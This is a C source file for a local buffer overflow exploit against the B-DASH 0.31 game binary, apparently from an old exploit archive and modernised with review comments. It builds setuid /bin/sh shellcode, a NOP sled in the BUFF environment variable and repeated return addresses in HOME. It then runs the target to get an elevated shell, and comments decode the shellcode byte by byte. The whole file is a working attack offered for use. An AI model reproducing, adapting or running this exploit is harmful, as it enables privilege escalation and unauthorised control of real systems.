/*
 *
 *   B-DASH 0.31 buffer overflow
 *
 *    by   plaguez
 *         dube0866@eurobretagne.fr
 *         http://www.innu.org
 *
 *
 *  compile:   cc bdexp.c -o bdexp
 *  exec:      ./bdexp 8
 *         or  ./bdexp 4
 *         or  ./bdexp 24 ...
 *  you may want to brute-force the offset (argv[1]): it is subtracted from the
 *  stack pointer sampled by get_sp() to form the return address that is written
 *  into HOME, so try several small multiples of 4 if the first guess fails
 */


#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define EGGSIZE 2048

/*
 * Linux/x86 (32-bit, int 0x80) payload, decoded from the bytes below:
 *   setuid(geteuid()) to keep the target's effective uid, then
 *   execve("/bin/sh", {"/bin/sh", NULL}, NULL), then exit(0).
 * It is position independent: `push imm32; call *%esp` leaves the address of
 * the following instruction in ecx, and the path is located by scanning
 * forward for the '/' marker that ends the code. The trailing "0" is a second
 * marker that the payload overwrites with a NUL at run time, so it is part of
 * the payload and not a typo (strlen(shellcode) on the copy below includes it).
 */
char *shellcode =
  /* 31 c0 b0 31 cd 80   xor eax,eax; mov al,0x31; int 0x80  -> geteuid()
     93                  xchg eax,ebx                         -> ebx = euid
     31 c0 b0 17 cd 80   mov al,0x17; int 0x80                -> setuid(ebx)
     68 59 58 ff e1      push 0xe1ff5859 (bytes = pop ecx; pop eax; jmp ecx) */
  "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  /* ff d4               call *%esp -> runs the pushed stub: pop ecx takes the
                                       return address (= the next byte), pop eax
                                       discards the stub dword, jmp ecx resumes
     31 c0 99            eax = 0; cdq -> edx = 0
     89 cf               edi = ecx
     b0 2e 40            al = 0x2f ('/')
     ae 75 fd            scasb / jnz: scan forward for the '/' marker
     89 39               [ecx]   = edi -> argv[0] = "/bin/sh" (over already-run bytes)
     89 51 04            [ecx+4] = edx -> argv[1] = NULL */
  "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
  /* 89 fb               ebx = edi -> pathname
     40 ae 75 fd         al = 0x30 ('0'); scan forward for the '0' marker
     88 57 ff            [edi-1] = dl -> replace that '0' with NUL
     b0 0b cd 80         execve(ebx, ecx, edx)
     31 c0 40 31 db      eax = 1, ebx = 0 */
  "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
  /* cd 80               exit(0); the '/' after it is the marker the first scan
                         stops on, so edi then points at "/bin/sh" */
  "\xcd\x80/"
  "/bin/sh"
  /* '0' marker, turned into the string terminator at run time (see 88 57 ff) */
  "0";

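/*
 * Return the current stack pointer.
 *
 * The original version moved %esp into %eax and fell off the end of a
 * non-void function, relying on the caller reading %eax: that is undefined
 * behaviour and only works at -O0. Use an output operand and an explicit
 * return instead. The exploit itself targets 32-bit x86; the 64-bit and
 * generic branches only keep this file compiling elsewhere.
 */
unsigned long get_sp(void)
{
  unsigned long sp;
#if defined(__i386__)
  __asm__ __volatile__("movl %%esp, %0" : "=r"(sp));
#elif defined(__x86_64__)
  __asm__ __volatile__("movq %%rsp, %0" : "=r"(sp));
#else
  /* No inline asm for this target: the address of a local is a close
     approximation of the stack pointer and good enough for the offset guess. */
  volatile char probe = 0;
  sp = (unsigned long)&probe;
#endif
  return sp;
}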

char *buffer;  /* bsize bytes of the repeated return-address guess, exported as HOME */
char *egg;     /* EGGSIZE-byte 0x90 sled ending in `shellcode`, exported as BUFF */

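/*
 * Entry point. Builds two environment variables and executes the target:
 *   BUFF - EGGSIZE bytes of NOP sled (0x90) with `shellcode` placed at the end
 *   HOME - bsize bytes made of the same guessed return address
 *          (get_sp() - offset) repeated as 4-byte words; this is the value
 *          bdash 0.31 overflows on
 * argv[1] is the decimal offset subtracted from the sampled stack pointer.
 *
 * Returns 1 on a usage, allocation, setenv or exec failure; on success
 * execl() replaces the process and does not return.
 *
 * Fixes over the original: implicit `int main`; `string.h` functions were
 * used without a prototype; `buffer` was handed to setenv() without a NUL
 * terminator, so strlen() ran past the allocation; the address stores went
 * through `long *` in 4-byte steps, which overruns on 64-bit hosts; atoi(),
 * malloc(), setenv() and execl() results were never checked.
 */
int main(int argc, char **argv)
{
  int bsize = 1124;
  long offset;
  char *end;
  uint32_t ret;
  size_t sclen;
  int i;

  if (argc != 2)
    {
      fprintf(stderr, "\nusage  %s <offset>", argv[0]);
      return 1;
    }

  /* strtol instead of atoi: reject garbage or overflow instead of using 0. */
  errno = 0;
  offset = strtol(argv[1], &end, 10);
  if (end == argv[1] || *end != '\0' || errno == ERANGE)
    {
      fprintf(stderr, "bad offset: %s\n", argv[1]);
      return 1;
    }

  egg = malloc(EGGSIZE);
  /* +1: setenv() reads `buffer` as a C string, so it needs room for a NUL. */
  buffer = malloc((size_t)bsize + 1);
  if (egg == NULL || buffer == NULL)
    {
      perror("malloc");
      return 1;
    }

  /* The target is 32-bit x86, so a return address is a 4-byte word. Sample
     the stack once (every call from this frame sees the same value) and tile
     the buffer with it via memcpy rather than `long *` stores. */
  ret = (uint32_t)(get_sp() - (unsigned long)offset);
  for (i = 0; i + 4 <= bsize; i += 4)
    memcpy(buffer + i, &ret, sizeof ret);
  buffer[bsize] = '\0';
  /* NOTE(review): if `ret` contains a 0x00 byte, setenv() stops copying there
     and HOME is shorter than intended; that is inherent to delivering the
     payload through the environment and one reason the offset is brute-forced. */

  /* Sled of 0x90 with the payload at the very end, one sled byte and the
     terminating NUL after it. */
  memset(egg, 0x90, EGGSIZE);
  sclen = strlen(shellcode);
  memcpy(&egg[EGGSIZE - sclen - 2], shellcode, sclen);
  egg[EGGSIZE - 1] = '\0';

  if (setenv("BUFF", egg, 1) != 0 || setenv("HOME", buffer, 1) != 0)
    {
      perror("setenv");
      return 1;
    }

  printf("\nb-dashing ...\n");
  execl("/usr/games/bdash", "/usr/games/bdash", (char *)NULL);
  /* Only reached if the exec itself failed. */
  perror("execl");
  return 1;
}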
/*                    www.hack.co.za              [2000]*/